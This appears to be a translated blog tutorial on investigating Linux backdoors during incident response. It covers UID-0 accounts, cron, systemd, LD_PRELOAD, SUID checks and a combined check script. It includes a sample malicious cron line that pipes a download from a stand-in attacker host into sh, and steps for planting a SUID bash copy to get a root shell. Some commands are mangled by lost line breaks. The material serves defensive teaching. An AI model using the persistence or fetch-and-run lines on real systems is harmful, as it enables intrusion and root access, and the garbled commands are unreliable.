Introduction to Emergency Response Backdoor Investigation (Linux Edition)

1. Common Backdoors

Classification of Common Backdoor Types:

Type Platform Characteristics
Account Backdoor Linux/Windows Creates hidden users or escalates privileges
Scheduled Task Backdoor Linux/Windows Uses cron / Task Scheduler to execute malicious programs
Startup Item Backdoor Windows/Linux Writes to startup items for persistence
Dynamic Link Library Hijacking Linux/Windows LD_PRELOAD / DLL injection
Process Injection Backdoor Linux/Windows Injects shellcode into legitimate processes
Web Memory Horse Web Application Memory-resident without landing, hard to detect
Rootkit Linux/Windows Hides files, processes, network connections, etc.

2. Detailed Investigation of Linux System Backdoors

1. Account Backdoor Investigation

(1) Check for multiple superusers with UID=0

awk -F: '$3==0 {print $1}' /etc/passwd
  • Normally, it should only output <span>root</span>.
  • If other usernames appear (e.g., <span>backdoor</span>), it indicates that a privileged account has been added.

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(2) Check the encrypted password fields in the Shadow file

grep '^\(root\|.*\$)' /etc/shadow
  • Check if any non-root users are using <span>$1$</span> (MD5) or <span>$6$</span> (SHA-512) encrypted passwords.
  • Abnormal situation: Users with empty passwords are allowed local login but prohibited from remote SSH login.

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(3) Disable suspicious accounts

usermod -L username    # Lock the account
userdel -r username    # Delete the account and its home directory

2. Command History Analysis (Traceback)

(1) View the command history of the current user

history

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(2) Enhance history logging (defensive configuration)

Edit <span>/etc/profile</span>, and add the following content:

########## Enhance History Logging ##########
USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')
if [ "$USER_IP" = "" ]; then
    USER_IP=$(hostname)
fi
export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
shopt -s histappend
export PROMPT_COMMAND="history -a"
########## End ##########

(3) Clear command history (emergency operation)

history -c> ~/.bash_history

3. Scheduled Task Backdoor Investigation

(1) Check system-level scheduled tasks (crontab)

# View system cron configuration
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.{hourly,daily,weekly,monthly}
# Check each user's crontab
for user in $(cut -f1 -d: /etc/passwd); do
    echo "=== Crontab for $user ==="
    crontab -u $user -l 2>/dev/null
done

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(2) Common malicious cron examples

* * * * * /tmp/.malicious.sh
*/5 * * * * curl http://attacker.com/sh | sh

(3) Remove abnormal tasks

crontab -e                    # Edit current user tasks
crontab -u username -r        # Delete all tasks for specified user

4. Startup Items and Service Backdoor Investigation

(1) SysVinit System (Old Version)

chkconfig --list | grep 3:on

(2) Systemd System (Mainstream)

systemctl list-unit-files --type=service | grep enabled

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(3) Find custom service files

find /etc/systemd/system/ -name "*.service" -exec cat {} \;

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

5. Dynamic Link Library Preloading Backdoor (LD_PRELOAD)

Principle

By setting the environment variable <span>LD_PRELOAD</span>, malicious <span>.so</span> files are loaded to hijack standard functions (e.g., <span>getuid</span>, <span>fopen</span>).

Investigation Methods

(1) Check for abnormal <span>/etc/ld.so.preload</span>
cat /etc/ld.so.preload
  • Normally, this file should not exist or be empty.
  • If it exists and points to a <span>.so</span> file, it is likely a backdoor.

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

(2) Use <span>strace</span> to trace dynamic library loading
strace -e trace=openat,execve ls 2>&1 | grep '\.so'
(3) Check if environment variables have been tampered with
env | grep LD_PRELOAD
ps aux | grep -i preload

6. SUID Privilege Escalation Backdoor

Principle

Sets executable files with SUID permissions to run as the owner.

Implanting a Backdoor

cp /bin/bash /tmp/nf
chmod +s /tmp/nf

Exploitation:

/tmp/nf -p  # Get root shell

Investigation Command

find / -perm -4000 -type f -exec ls -ldb {} \; 2>/dev/null

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

Key Focus:

  • SUID programs in non-official paths (e.g., <span>/tmp</span>, <span>/dev/shm</span>)
  • SUID programs not owned by root

Removal

chmod -s /tmp/nfrm /tmp/nf

3. Comprehensive Investigation Script (Linux)

#!/bin/bashecho "========== Comprehensive System Backdoor Investigation Script =========="
echo "[+] 1. Check privileged users"
awk -F: '$3==0 {print $1}' /etc/passwd
echo "[+] 2. Check remote login accounts"
grep '\$6\$' /etc/shadow | cut -d: -f1
echo "[+] 3. Check sudo permission users"
grep "ALL=(ALL)" /etc/sudoers /etc/sudoers.d/* 2>/dev/null
echo "[+] 4. Check scheduled tasks"
(crontab -l 2>/dev/null; echo; for u in $(cut -f1 -d: /etc/passwd); do crontab -u $u -l 2>/dev/null; done)
echo "[+] 5. Check startup services"
systemctl list-unit-files --type=service | grep enabled
echo "[+] 6. Check SUID files"
find / -perm -4000 -type f -exec ls -ldb {} \; 2>/dev/null | head -20
echo "[+] 7. Check LD_PRELOAD and /etc/ld.so.preload"
cat /etc/ld.so.preload 2>/dev/null || echo "Not found"
env | grep LD_PRELOAD
echo "[+] 8. Check abnormal network connections"
netstat -antlp | grep ESTABLISHED
echo "[+] 9. Check recently modified files (last 1 day)"
find /tmp /var/tmp /dev/shm -mtime -1 -type f -exec ls -la {} \;
echo "[+] 10. Check .bash_history"
head ~/.bash_history
echo "========================================"

Save as <span>backdoor_check.sh</span> and execute:

chmod +x backdoor_check.sh
./backdoor_check.sh > report.txt

Internal team knowledge link is as follows, with discounts available~

Introduction to Emergency Response Backdoor Investigation (Linux Edition)

Previous Recommendations

Dictionary Generation Tool “Flash Purple”, AI-assisted generation effect, welcomes major update v1.1.1!

[Practical SRC] Vulnerability Mining Case of XSS Vulnerability

[Overseas SRC] Vulnerability Mining of Business Vulnerabilities

[Practical SRC] Vulnerability Mining of WSDL Service Injection

Guide to Using Leichi WAF, How to Strengthen Detection Rule Configuration

Analysis of Youhui U8C Vulnerability – FilterCondAction Method SQL Injection Vulnerability

Yakit Vulnerability – View UnpublishedPrivate Plugins (Fixed)

Discussion on the Journey of Leak Mining – The End of the Prize Pool

Leave a Comment